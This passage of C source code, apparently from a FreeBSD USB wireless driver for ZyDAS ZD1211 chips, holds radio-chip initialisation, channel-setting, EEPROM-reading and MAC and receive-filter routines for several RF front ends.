zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int error, i; struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phy[] = ZYD_AL2230_PHY_FINI_PART1; for (i = 0; i < N(phy); i++) zyd_write16_m(sc, phy[i].reg, phy[i].val); if (sc->sc_newphy != 0) zyd_write16_m(sc, ZYD_CR9, 0xe1); zyd_write16_m(sc, ZYD_CR203, 0x6); fail: return (error); #undef N } static int zyd_al2230_init_b(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phy1[] = ZYD_AL2230_PHY_PART1; static const struct zyd_phy_pair phy2[] = ZYD_AL2230_PHY_PART2; static const struct zyd_phy_pair phy3[] = ZYD_AL2230_PHY_PART3; static const struct zyd_phy_pair phy2230s[] = ZYD_AL2230S_PHY_INIT; static const struct zyd_phy_pair phyini[] = ZYD_AL2230_PHY_B; static const uint32_t rfini_part1[] = ZYD_AL2230_RF_B_PART1; static const uint32_t rfini_part2[] = ZYD_AL2230_RF_B_PART2; static const uint32_t rfini_part3[] = ZYD_AL2230_RF_B_PART3; static const uint32_t zyd_al2230_chtable[][3] = ZYD_AL2230_CHANTABLE; int i, error; for (i = 0; i < N(phy1); i++) zyd_write16_m(sc, phy1[i].reg, phy1[i].val); /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) zyd_write16_m(sc, phyini[i].reg, phyini[i].val); if (sc->sc_rfrev == ZYD_RF_AL2230S || sc->sc_al2230s != 0) { for (i = 0; i < N(phy2230s); i++) zyd_write16_m(sc, phy2230s[i].reg, phy2230s[i].val); } for (i = 0; i < 3; i++) { error = zyd_rfwrite_cr(sc, zyd_al2230_chtable[0][i]); if (error != 0) return (error); } for (i = 0; i < N(rfini_part1); i++) { error = zyd_rfwrite_cr(sc, rfini_part1[i]); if (error != 0) return (error); } if (sc->sc_rfrev == ZYD_RF_AL2230S || sc->sc_al2230s != 0) error = zyd_rfwrite(sc, 0x241000); else error = zyd_rfwrite(sc, 0x25a000); if (error != 0) goto fail; for (i = 0; i < N(rfini_part2); i++) { error = zyd_rfwrite_cr(sc, rfini_part2[i]); if (error != 0) return (error); } for (i = 0; i < N(phy2); i++) zyd_write16_m(sc, phy2[i].reg, phy2[i].val); for (i = 0; i < N(rfini_part3); i++) { error = zyd_rfwrite_cr(sc, rfini_part3[i]); if (error != 0) return (error); } for (i = 0; i < N(phy3); i++) zyd_write16_m(sc, phy3[i].reg, phy3[i].val); error = zyd_al2230_fini(rf); fail: return (error); #undef N } static int zyd_al2230_switch_radio(struct zyd_rf *rf, int on) { struct zyd_softc *sc = rf->rf_sc; int error, on251 = (sc->sc_macrev == ZYD_ZD1211) ? 0x3f : 0x7f; zyd_write16_m(sc, ZYD_CR11, on ? 0x00 : 0x04); zyd_write16_m(sc, ZYD_CR251, on ? on251 : 0x2f); fail: return (error); } static int zyd_al2230_set_channel(struct zyd_rf *rf, uint8_t chan) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int error, i; struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phy1[] = { { ZYD_CR138, 0x28 }, { ZYD_CR203, 0x06 }, }; static const struct { uint32_t r1, r2, r3; } rfprog[] = ZYD_AL2230_CHANTABLE; error = zyd_rfwrite(sc, rfprog[chan - 1].r1); if (error != 0) goto fail; error = zyd_rfwrite(sc, rfprog[chan - 1].r2); if (error != 0) goto fail; error = zyd_rfwrite(sc, rfprog[chan - 1].r3); if (error != 0) goto fail; for (i = 0; i < N(phy1); i++) zyd_write16_m(sc, phy1[i].reg, phy1[i].val); fail: return (error); #undef N } static int zyd_al2230_set_channel_b(struct zyd_rf *rf, uint8_t chan) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int error, i; struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phy1[] = ZYD_AL2230_PHY_PART1; static const struct { uint32_t r1, r2, r3; } rfprog[] = ZYD_AL2230_CHANTABLE_B; for (i = 0; i < N(phy1); i++) zyd_write16_m(sc, phy1[i].reg, phy1[i].val); error = zyd_rfwrite_cr(sc, rfprog[chan - 1].r1); if (error != 0) goto fail; error = zyd_rfwrite_cr(sc, rfprog[chan - 1].r2); if (error != 0) goto fail; error = zyd_rfwrite_cr(sc, rfprog[chan - 1].r3); if (error != 0) goto fail; error = zyd_al2230_fini(rf); fail: return (error); #undef N } #define ZYD_AL2230_PHY_BANDEDGE6 \ { \ { ZYD_CR128, 0x14 }, { ZYD_CR129, 0x12 }, { ZYD_CR130, 0x10 }, \ { ZYD_CR47, 0x1e } \ } static int zyd_al2230_bandedge6(struct zyd_rf *rf, struct ieee80211_channel *c) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int error = 0, i; struct zyd_softc *sc = rf->rf_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct zyd_phy_pair r[] = ZYD_AL2230_PHY_BANDEDGE6; int chan = ieee80211_chan2ieee(ic, c); if (chan == 1 || chan == 11) r[0].val = 0x12; for (i = 0; i < N(r); i++) zyd_write16_m(sc, r[i].reg, r[i].val); fail: return (error); #undef N } /* * AL7230B RF methods. */ static int zyd_al7230B_init(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini_1[] = ZYD_AL7230B_PHY_1; static const struct zyd_phy_pair phyini_2[] = ZYD_AL7230B_PHY_2; static const struct zyd_phy_pair phyini_3[] = ZYD_AL7230B_PHY_3; static const uint32_t rfini_1[] = ZYD_AL7230B_RF_1; static const uint32_t rfini_2[] = ZYD_AL7230B_RF_2; int i, error; /* for AL7230B, PHY and RF need to be initialized in "phases" */ /* init RF-dependent PHY registers, part one */ for (i = 0; i < N(phyini_1); i++) zyd_write16_m(sc, phyini_1[i].reg, phyini_1[i].val); /* init AL7230B radio, part one */ for (i = 0; i < N(rfini_1); i++) { if ((error = zyd_rfwrite(sc, rfini_1[i])) != 0) return (error); } /* init RF-dependent PHY registers, part two */ for (i = 0; i < N(phyini_2); i++) zyd_write16_m(sc, phyini_2[i].reg, phyini_2[i].val); /* init AL7230B radio, part two */ for (i = 0; i < N(rfini_2); i++) { if ((error = zyd_rfwrite(sc, rfini_2[i])) != 0) return (error); } /* init RF-dependent PHY registers, part three */ for (i = 0; i < N(phyini_3); i++) zyd_write16_m(sc, phyini_3[i].reg, phyini_3[i].val); fail: return (error); #undef N } static int zyd_al7230B_switch_radio(struct zyd_rf *rf, int on) { int error; struct zyd_softc *sc = rf->rf_sc; zyd_write16_m(sc, ZYD_CR11, on ? 0x00 : 0x04); zyd_write16_m(sc, ZYD_CR251, on ? 0x3f : 0x2f); fail: return (error); } static int zyd_al7230B_set_channel(struct zyd_rf *rf, uint8_t chan) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct { uint32_t r1, r2; } rfprog[] = ZYD_AL7230B_CHANTABLE; static const uint32_t rfsc[] = ZYD_AL7230B_RF_SETCHANNEL; int i, error; zyd_write16_m(sc, ZYD_CR240, 0x57); zyd_write16_m(sc, ZYD_CR251, 0x2f); for (i = 0; i < N(rfsc); i++) { if ((error = zyd_rfwrite(sc, rfsc[i])) != 0) return (error); } zyd_write16_m(sc, ZYD_CR128, 0x14); zyd_write16_m(sc, ZYD_CR129, 0x12); zyd_write16_m(sc, ZYD_CR130, 0x10); zyd_write16_m(sc, ZYD_CR38, 0x38); zyd_write16_m(sc, ZYD_CR136, 0xdf); error = zyd_rfwrite(sc, rfprog[chan - 1].r1); if (error != 0) goto fail; error = zyd_rfwrite(sc, rfprog[chan - 1].r2); if (error != 0) goto fail; error = zyd_rfwrite(sc, 0x3c9000); if (error != 0) goto fail; zyd_write16_m(sc, ZYD_CR251, 0x3f); zyd_write16_m(sc, ZYD_CR203, 0x06); zyd_write16_m(sc, ZYD_CR240, 0x08); fail: return (error); #undef N } /* * AL2210 RF methods. */ static int zyd_al2210_init(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini[] = ZYD_AL2210_PHY; static const uint32_t rfini[] = ZYD_AL2210_RF; uint32_t tmp; int i, error; zyd_write32_m(sc, ZYD_CR18, 2); /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) zyd_write16_m(sc, phyini[i].reg, phyini[i].val); /* init AL2210 radio */ for (i = 0; i < N(rfini); i++) { if ((error = zyd_rfwrite(sc, rfini[i])) != 0) return (error); } zyd_write16_m(sc, ZYD_CR47, 0x1e); zyd_read32_m(sc, ZYD_CR_RADIO_PD, &tmp); zyd_write32_m(sc, ZYD_CR_RADIO_PD, tmp & ~1); zyd_write32_m(sc, ZYD_CR_RADIO_PD, tmp | 1); zyd_write32_m(sc, ZYD_CR_RFCFG, 0x05); zyd_write32_m(sc, ZYD_CR_RFCFG, 0x00); zyd_write16_m(sc, ZYD_CR47, 0x1e); zyd_write32_m(sc, ZYD_CR18, 3); fail: return (error); #undef N } static int zyd_al2210_switch_radio(struct zyd_rf *rf, int on) { /* vendor driver does nothing for this RF chip */ return (0); } static int zyd_al2210_set_channel(struct zyd_rf *rf, uint8_t chan) { int error; struct zyd_softc *sc = rf->rf_sc; static const uint32_t rfprog[] = ZYD_AL2210_CHANTABLE; uint32_t tmp; zyd_write32_m(sc, ZYD_CR18, 2); zyd_write16_m(sc, ZYD_CR47, 0x1e); zyd_read32_m(sc, ZYD_CR_RADIO_PD, &tmp); zyd_write32_m(sc, ZYD_CR_RADIO_PD, tmp & ~1); zyd_write32_m(sc, ZYD_CR_RADIO_PD, tmp | 1); zyd_write32_m(sc, ZYD_CR_RFCFG, 0x05); zyd_write32_m(sc, ZYD_CR_RFCFG, 0x00); zyd_write16_m(sc, ZYD_CR47, 0x1e); /* actually set the channel */ error = zyd_rfwrite(sc, rfprog[chan - 1]); if (error != 0) goto fail; zyd_write32_m(sc, ZYD_CR18, 3); fail: return (error); } /* * GCT RF methods. */ static int zyd_gct_init(struct zyd_rf *rf) { #define ZYD_GCT_INTR_REG 0x85c1 #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini[] = ZYD_GCT_PHY; static const uint32_t rfini[] = ZYD_GCT_RF; static const uint16_t vco[11][7] = ZYD_GCT_VCO; int i, idx = -1, error; uint16_t data; /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) zyd_write16_m(sc, phyini[i].reg, phyini[i].val); /* init cgt radio */ for (i = 0; i < N(rfini); i++) { if ((error = zyd_rfwrite(sc, rfini[i])) != 0) return (error); } error = zyd_gct_mode(rf); if (error != 0) return (error); for (i = 0; i < (int)(N(vco) - 1); i++) { error = zyd_gct_set_channel_synth(rf, 1, 0); if (error != 0) goto fail; error = zyd_gct_write(rf, vco[i][0]); if (error != 0) goto fail; zyd_write16_m(sc, ZYD_GCT_INTR_REG, 0xf); zyd_read16_m(sc, ZYD_GCT_INTR_REG, &data); if ((data & 0xf) == 0) { idx = i; break; } } if (idx == -1) { error = zyd_gct_set_channel_synth(rf, 1, 1); if (error != 0) goto fail; error = zyd_gct_write(rf, 0x6662); if (error != 0) goto fail; } rf->idx = idx; zyd_write16_m(sc, ZYD_CR203, 0x6); fail: return (error); #undef N #undef ZYD_GCT_INTR_REG } static int zyd_gct_mode(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const uint32_t mode[] = { 0x25f98, 0x25f9a, 0x25f94, 0x27fd4 }; int i, error; for (i = 0; i < N(mode); i++) { if ((error = zyd_rfwrite(sc, mode[i])) != 0) break; } return (error); #undef N } static int zyd_gct_set_channel_synth(struct zyd_rf *rf, int chan, int acal) { int error, idx = chan - 1; struct zyd_softc *sc = rf->rf_sc; static uint32_t acal_synth[] = ZYD_GCT_CHANNEL_ACAL; static uint32_t std_synth[] = ZYD_GCT_CHANNEL_STD; static uint32_t div_synth[] = ZYD_GCT_CHANNEL_DIV; error = zyd_rfwrite(sc, (acal == 1) ? acal_synth[idx] : std_synth[idx]); if (error != 0) return (error); return zyd_rfwrite(sc, div_synth[idx]); } static int zyd_gct_write(struct zyd_rf *rf, uint16_t value) { struct zyd_softc *sc = rf->rf_sc; return zyd_rfwrite(sc, 0x300000 | 0x40000 | value); } static int zyd_gct_switch_radio(struct zyd_rf *rf, int on) { int error; struct zyd_softc *sc = rf->rf_sc; error = zyd_rfwrite(sc, on ? 0x25f94 : 0x25f90); if (error != 0) return (error); zyd_write16_m(sc, ZYD_CR11, on ? 0x00 : 0x04); zyd_write16_m(sc, ZYD_CR251, on ? ((sc->sc_macrev == ZYD_ZD1211B) ? 0x7f : 0x3f) : 0x2f); fail: return (error); } static int zyd_gct_set_channel(struct zyd_rf *rf, uint8_t chan) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int error, i; struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair cmd[] = { { ZYD_CR80, 0x30 }, { ZYD_CR81, 0x30 }, { ZYD_CR79, 0x58 }, { ZYD_CR12, 0xf0 }, { ZYD_CR77, 0x1b }, { ZYD_CR78, 0x58 }, }; static const uint16_t vco[11][7] = ZYD_GCT_VCO; error = zyd_gct_set_channel_synth(rf, chan, 0); if (error != 0) goto fail; error = zyd_gct_write(rf, (rf->idx == -1) ? 0x6662 : vco[rf->idx][((chan - 1) / 2)]); if (error != 0) goto fail; error = zyd_gct_mode(rf); if (error != 0) return (error); for (i = 0; i < N(cmd); i++) zyd_write16_m(sc, cmd[i].reg, cmd[i].val); error = zyd_gct_txgain(rf, chan); if (error != 0) return (error); zyd_write16_m(sc, ZYD_CR203, 0x6); fail: return (error); #undef N } static int zyd_gct_txgain(struct zyd_rf *rf, uint8_t chan) { #define N(a) (sizeof(a) / sizeof((a)[0])) struct zyd_softc *sc = rf->rf_sc; static uint32_t txgain[] = ZYD_GCT_TXGAIN; uint8_t idx = sc->sc_pwrint[chan - 1]; if (idx >= N(txgain)) { device_printf(sc->sc_dev, "could not set TX gain (%d %#x)\n", chan, idx); return 0; } return zyd_rfwrite(sc, 0x700000 | txgain[idx]); #undef N } /* * Maxim2 RF methods. */ static int zyd_maxim2_init(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini[] = ZYD_MAXIM2_PHY; static const uint32_t rfini[] = ZYD_MAXIM2_RF; uint16_t tmp; int i, error; /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) zyd_write16_m(sc, phyini[i].reg, phyini[i].val); zyd_read16_m(sc, ZYD_CR203, &tmp); zyd_write16_m(sc, ZYD_CR203, tmp & ~(1 << 4)); /* init maxim2 radio */ for (i = 0; i < N(rfini); i++) { if ((error = zyd_rfwrite(sc, rfini[i])) != 0) return (error); } zyd_read16_m(sc, ZYD_CR203, &tmp); zyd_write16_m(sc, ZYD_CR203, tmp | (1 << 4)); fail: return (error); #undef N } static int zyd_maxim2_switch_radio(struct zyd_rf *rf, int on) { /* vendor driver does nothing for this RF chip */ return (0); } static int zyd_maxim2_set_channel(struct zyd_rf *rf, uint8_t chan) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini[] = ZYD_MAXIM2_PHY; static const uint32_t rfini[] = ZYD_MAXIM2_RF; static const struct { uint32_t r1, r2; } rfprog[] = ZYD_MAXIM2_CHANTABLE; uint16_t tmp; int i, error; /* * Do the same as we do when initializing it, except for the channel * values coming from the two channel tables. */ /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) zyd_write16_m(sc, phyini[i].reg, phyini[i].val); zyd_read16_m(sc, ZYD_CR203, &tmp); zyd_write16_m(sc, ZYD_CR203, tmp & ~(1 << 4)); /* first two values taken from the chantables */ error = zyd_rfwrite(sc, rfprog[chan - 1].r1); if (error != 0) goto fail; error = zyd_rfwrite(sc, rfprog[chan - 1].r2); if (error != 0) goto fail; /* init maxim2 radio - skipping the two first values */ for (i = 2; i < N(rfini); i++) { if ((error = zyd_rfwrite(sc, rfini[i])) != 0) return (error); } zyd_read16_m(sc, ZYD_CR203, &tmp); zyd_write16_m(sc, ZYD_CR203, tmp | (1 << 4)); fail: return (error); #undef N } static int zyd_rf_attach(struct zyd_softc *sc, uint8_t type) { struct zyd_rf *rf = &sc->sc_rf; rf->rf_sc = sc; rf->update_pwr = 1; switch (type) { case ZYD_RF_RFMD: rf->init = zyd_rfmd_init; rf->switch_radio = zyd_rfmd_switch_radio; rf->set_channel = zyd_rfmd_set_channel; rf->width = 24; /* 24-bit RF values */ break; case ZYD_RF_AL2230: case ZYD_RF_AL2230S: if (sc->sc_macrev == ZYD_ZD1211B) { rf->init = zyd_al2230_init_b; rf->set_channel = zyd_al2230_set_channel_b; } else { rf->init = zyd_al2230_init; rf->set_channel = zyd_al2230_set_channel; } rf->switch_radio = zyd_al2230_switch_radio; rf->bandedge6 = zyd_al2230_bandedge6; rf->width = 24; /* 24-bit RF values */ break; case ZYD_RF_AL7230B: rf->init = zyd_al7230B_init; rf->switch_radio = zyd_al7230B_switch_radio; rf->set_channel = zyd_al7230B_set_channel; rf->width = 24; /* 24-bit RF values */ break; case ZYD_RF_AL2210: rf->init = zyd_al2210_init; rf->switch_radio = zyd_al2210_switch_radio; rf->set_channel = zyd_al2210_set_channel; rf->width = 24; /* 24-bit RF values */ break; case ZYD_RF_MAXIM_NEW: case ZYD_RF_GCT: rf->init = zyd_gct_init; rf->switch_radio = zyd_gct_switch_radio; rf->set_channel = zyd_gct_set_channel; rf->width = 24; /* 24-bit RF values */ rf->update_pwr = 0; break; case ZYD_RF_MAXIM_NEW2: rf->init = zyd_maxim2_init; rf->switch_radio = zyd_maxim2_switch_radio; rf->set_channel = zyd_maxim2_set_channel; rf->width = 18; /* 18-bit RF values */ break; default: device_printf(sc->sc_dev, "sorry, radio \"%s\" is not supported yet\n", zyd_rf_name(type)); return (EINVAL); } return (0); } static const char * zyd_rf_name(uint8_t type) { static const char * const zyd_rfs[] = { "unknown", "unknown", "UW2451", "UCHIP", "AL2230", "AL7230B", "THETA", "AL2210", "MAXIM_NEW", "GCT", "AL2230S", "RALINK", "INTERSIL", "RFMD", "MAXIM_NEW2", "PHILIPS" }; return zyd_rfs[(type > 15) ? 0 : type]; } static int zyd_hw_init(struct zyd_softc *sc) { int error; const struct zyd_phy_pair *phyp; struct zyd_rf *rf = &sc->sc_rf; uint16_t val; /* specify that the plug and play is finished */ zyd_write32_m(sc, ZYD_MAC_AFTER_PNP, 1); zyd_read16_m(sc, ZYD_FIRMWARE_BASE_ADDR, &sc->sc_fwbase); DPRINTF(sc, ZYD_DEBUG_FW, "firmware base address=0x%04x\n", sc->sc_fwbase); /* retrieve firmware revision number */ zyd_read16_m(sc, sc->sc_fwbase + ZYD_FW_FIRMWARE_REV, &sc->sc_fwrev); zyd_write32_m(sc, ZYD_CR_GPI_EN, 0); zyd_write32_m(sc, ZYD_MAC_CONT_WIN_LIMIT, 0x7f043f); /* set mandatory rates - XXX assumes 802.11b/g */ zyd_write32_m(sc, ZYD_MAC_MAN_RATE, 0x150f); /* disable interrupts */ zyd_write32_m(sc, ZYD_CR_INTERRUPT, 0); if ((error = zyd_read_pod(sc)) != 0) { device_printf(sc->sc_dev, "could not read EEPROM\n"); goto fail; } /* PHY init (resetting) */ error = zyd_lock_phy(sc); if (error != 0) goto fail; phyp = (sc->sc_macrev == ZYD_ZD1211B) ? zyd_def_phyB : zyd_def_phy; for (; phyp->reg != 0; phyp++) zyd_write16_m(sc, phyp->reg, phyp->val); if (sc->sc_macrev == ZYD_ZD1211 && sc->sc_fix_cr157 != 0) { zyd_read16_m(sc, ZYD_EEPROM_PHY_REG, &val); zyd_write32_m(sc, ZYD_CR157, val >> 8); } error = zyd_unlock_phy(sc); if (error != 0) goto fail; /* HMAC init */ zyd_write32_m(sc, ZYD_MAC_ACK_EXT, 0x00000020); zyd_write32_m(sc, ZYD_CR_ADDA_MBIAS_WT, 0x30000808); zyd_write32_m(sc, ZYD_MAC_SNIFFER, 0x00000000); zyd_write32_m(sc, ZYD_MAC_RXFILTER, 0x00000000); zyd_write32_m(sc, ZYD_MAC_GHTBL, 0x00000000); zyd_write32_m(sc, ZYD_MAC_GHTBH, 0x80000000); zyd_write32_m(sc, ZYD_MAC_MISC, 0x000000a4); zyd_write32_m(sc, ZYD_CR_ADDA_PWR_DWN, 0x0000007f); zyd_write32_m(sc, ZYD_MAC_BCNCFG, 0x00f00401); zyd_write32_m(sc, ZYD_MAC_PHY_DELAY2, 0x00000000); zyd_write32_m(sc, ZYD_MAC_ACK_EXT, 0x00000080); zyd_write32_m(sc, ZYD_CR_ADDA_PWR_DWN, 0x00000000); zyd_write32_m(sc, ZYD_MAC_SIFS_ACK_TIME, 0x00000100); zyd_write32_m(sc, ZYD_CR_RX_PE_DELAY, 0x00000070); zyd_write32_m(sc, ZYD_CR_PS_CTRL, 0x10000000); zyd_write32_m(sc, ZYD_MAC_RTSCTSRATE, 0x02030203); zyd_write32_m(sc, ZYD_MAC_AFTER_PNP, 1); zyd_write32_m(sc, ZYD_MAC_BACKOFF_PROTECT, 0x00000114); zyd_write32_m(sc, ZYD_MAC_DIFS_EIFS_SIFS, 0x0a47c032); zyd_write32_m(sc, ZYD_MAC_CAM_MODE, 0x3); if (sc->sc_macrev == ZYD_ZD1211) { zyd_write32_m(sc, ZYD_MAC_RETRY, 0x00000002); zyd_write32_m(sc, ZYD_MAC_RX_THRESHOLD, 0x000c0640); } else { zyd_write32_m(sc, ZYD_MACB_MAX_RETRY, 0x02020202); zyd_write32_m(sc, ZYD_MACB_TXPWR_CTL4, 0x007f003f); zyd_write32_m(sc, ZYD_MACB_TXPWR_CTL3, 0x007f003f); zyd_write32_m(sc, ZYD_MACB_TXPWR_CTL2, 0x003f001f); zyd_write32_m(sc, ZYD_MACB_TXPWR_CTL1, 0x001f000f); zyd_write32_m(sc, ZYD_MACB_AIFS_CTL1, 0x00280028); zyd_write32_m(sc, ZYD_MACB_AIFS_CTL2, 0x008C003C); zyd_write32_m(sc, ZYD_MACB_TXOP, 0x01800824); zyd_write32_m(sc, ZYD_MAC_RX_THRESHOLD, 0x000c0eff); } /* init beacon interval to 100ms */ if ((error = zyd_set_beacon_interval(sc, 100)) != 0) goto fail; if ((error = zyd_rf_attach(sc, sc->sc_rfrev)) != 0) { device_printf(sc->sc_dev, "could not attach RF, rev 0x%x\n", sc->sc_rfrev); goto fail; } /* RF chip init */ error = zyd_lock_phy(sc); if (error != 0) goto fail; error = (*rf->init)(rf); if (error != 0) { device_printf(sc->sc_dev, "radio initialization failed, error %d\n", error); goto fail; } error = zyd_unlock_phy(sc); if (error != 0) goto fail; if ((error = zyd_read_eeprom(sc)) != 0) { device_printf(sc->sc_dev, "could not read EEPROM\n"); goto fail; } fail: return (error); } static int zyd_read_pod(struct zyd_softc *sc) { int error; uint32_t tmp; zyd_read32_m(sc, ZYD_EEPROM_POD, &tmp); sc->sc_rfrev = tmp & 0x0f; sc->sc_ledtype = (tmp >> 4) & 0x01; sc->sc_al2230s = (tmp >> 7) & 0x01; sc->sc_cckgain = (tmp >> 8) & 0x01; sc->sc_fix_cr157 = (tmp >> 13) & 0x01; sc->sc_parev = (tmp >> 16) & 0x0f; sc->sc_bandedge6 = (tmp >> 21) & 0x01; sc->sc_newphy = (tmp >> 31) & 0x01; sc->sc_txled = ((tmp & (1 << 24)) && (tmp & (1 << 29))) ? 0 : 1; fail: return (error); } static int zyd_read_eeprom(struct zyd_softc *sc) { uint16_t val; int error, i; /* read Tx power calibration tables */ for (i = 0; i < 7; i++) { zyd_read16_m(sc, ZYD_EEPROM_PWR_CAL + i, &val); sc->sc_pwrcal[i * 2] = val >> 8; sc->sc_pwrcal[i * 2 + 1] = val & 0xff; zyd_read16_m(sc, ZYD_EEPROM_PWR_INT + i, &val); sc->sc_pwrint[i * 2] = val >> 8; sc->sc_pwrint[i * 2 + 1] = val & 0xff; zyd_read16_m(sc, ZYD_EEPROM_36M_CAL + i, &val); sc->sc_ofdm36_cal[i * 2] = val >> 8; sc->sc_ofdm36_cal[i * 2 + 1] = val & 0xff; zyd_read16_m(sc, ZYD_EEPROM_48M_CAL + i, &val); sc->sc_ofdm48_cal[i * 2] = val >> 8; sc->sc_ofdm48_cal[i * 2 + 1] = val & 0xff; zyd_read16_m(sc, ZYD_EEPROM_54M_CAL + i, &val); sc->sc_ofdm54_cal[i * 2] = val >> 8; sc->sc_ofdm54_cal[i * 2 + 1] = val & 0xff; } fail: return (error); } static int zyd_get_macaddr(struct zyd_softc *sc) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = ZYD_READFWDATAREQ; USETW(req.wValue, ZYD_EEPROM_MAC_ADDR_P1); USETW(req.wIndex, 0); USETW(req.wLength, IEEE80211_ADDR_LEN); error = zyd_do_request(sc, &req, sc->sc_bssid); if (error != 0) { device_printf(sc->sc_dev, "could not read EEPROM: %s\n", usbd_errstr(error)); } return (error); } static int zyd_set_macaddr(struct zyd_softc *sc, const uint8_t *addr) { int error; uint32_t tmp; tmp = addr[3] << 24 | addr[2] << 16 | addr[1] << 8 | addr[0]; zyd_write32_m(sc, ZYD_MAC_MACADRL, tmp); tmp = addr[5] << 8 | addr[4]; zyd_write32_m(sc, ZYD_MAC_MACADRH, tmp); fail: return (error); } static int zyd_set_bssid(struct zyd_softc *sc, const uint8_t *addr) { int error; uint32_t tmp; tmp = addr[3] << 24 | addr[2] << 16 | addr[1] << 8 | addr[0]; zyd_write32_m(sc, ZYD_MAC_BSSADRL, tmp); tmp = addr[5] << 8 | addr[4]; zyd_write32_m(sc, ZYD_MAC_BSSADRH, tmp); fail: return (error); } static int zyd_switch_radio(struct zyd_softc *sc, int on) { struct zyd_rf *rf = &sc->sc_rf; int error; error = zyd_lock_phy(sc); if (error != 0) goto fail; error = (*rf->switch_radio)(rf, on); if (error != 0) goto fail; error = zyd_unlock_phy(sc); fail: return (error); } static int zyd_set_led(struct zyd_softc *sc, int which, int on) { int error; uint32_t tmp; zyd_read32_m(sc, ZYD_MAC_TX_PE_CONTROL, &tmp); tmp &= ~which; if (on) tmp |= which; zyd_write32_m(sc, ZYD_MAC_TX_PE_CONTROL, tmp); fail: return (error); } static void zyd_set_multi(struct zyd_softc *sc) { int error; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ifmultiaddr *ifma; uint32_t low, high; uint8_t v; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; low = 0x00000000; high = 0x80000000; if (ic->ic_opmode == IEEE80211_M_MONITOR || (ifp->if_flags & (IFF_ALLMULTI | IFF_PROMISC))) { low = 0xffffffff; high = 0xffffffff; } else { if_maddr_rlock(ifp); TAILQ_FOREACH(ifma, &ifp->if_multiaddrs, ifma_link) { if (ifma->ifma_addr->sa_family != AF_LINK) continue; v = ((uint8_t *)LLADDR((struct sockaddr_dl *) ifma->ifma_addr))[5] >> 2; if (v < 32) low |= 1 << v; else high |= 1 << (v - 32); } if_maddr_runlock(ifp); } /* reprogram multicast global hash table */ zyd_write32_m(sc, ZYD_MAC_GHTBL, low); zyd_write32_m(sc, ZYD_MAC_GHTBH, high); fail: if (error != 0) device_printf(sc->sc_dev, "could not set multicast hash table\n"); } static void zyd_update_mcast(struct ifnet *ifp) { struct zyd_softc *sc = ifp->if_softc; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; ZYD_LOCK(sc); zyd_set_multi(sc); ZYD_UNLOCK(sc); } static int zyd_set_rxfilter(struct zyd_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t rxfilter; switch (ic->ic_opmode) { case IEEE80211_M_STA: rxfilter = ZYD_FILTER_BSS; break; case IEEE80211_M_IBSS: case IEEE80211_M_HOSTAP: rxfilter = ZYD_FILTER_HOSTAP; break; case IEEE80211_M_MONITOR: rxfilter = ZYD_FILTER_MONITOR; break; default: /* should not get there */ return (EINVAL); } return zyd_write32(sc, ZYD_MAC_RXFILTER, rxfilter); } static void zyd_set_chan(struct zyd_softc *sc, struct ieee80211_channel *c) { int error; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct zyd_rf *rf = &sc->sc_rf; uint32_t tmp; int chan; chan = ieee80211_chan2ieee(ic, c); if (chan == 0 || chan == IEEE80211_CHAN_ANY) { /* XXX should NEVER happen */ device_printf(sc->sc_dev, "%s: invalid channel %x\n", __func__, chan); return; } error = zyd_lock_phy(sc); if (error != 0) goto fail; error = (*rf->set_channel)(rf, chan); if (error != 0) goto fail; if (rf->update_pwr) { /* update Tx power */ zyd_write16_m(sc, ZYD_CR31, sc->sc_pwrint[chan - 1]); if (sc->sc_macrev == ZYD_ZD1211B) { zyd_write16_m(sc, ZYD_CR67, sc->sc_ofdm36_cal[chan - 1]); zyd_write16_m(sc, ZYD_CR66, sc->sc_ofdm48_cal[chan - 1]); zyd_write16_m(sc, ZYD_CR65, sc->sc_ofdm54_cal[chan - 1]); zyd_write16_m(sc, ZYD_CR68, sc->sc_pwrcal[chan - 1]); zyd_write16_m(sc, ZYD_CR69, 0x28); zyd_write16_m(sc, ZYD_CR69, 0x2a); } } if (sc->sc_cckgain) { /* set CCK baseband gain from EEPROM 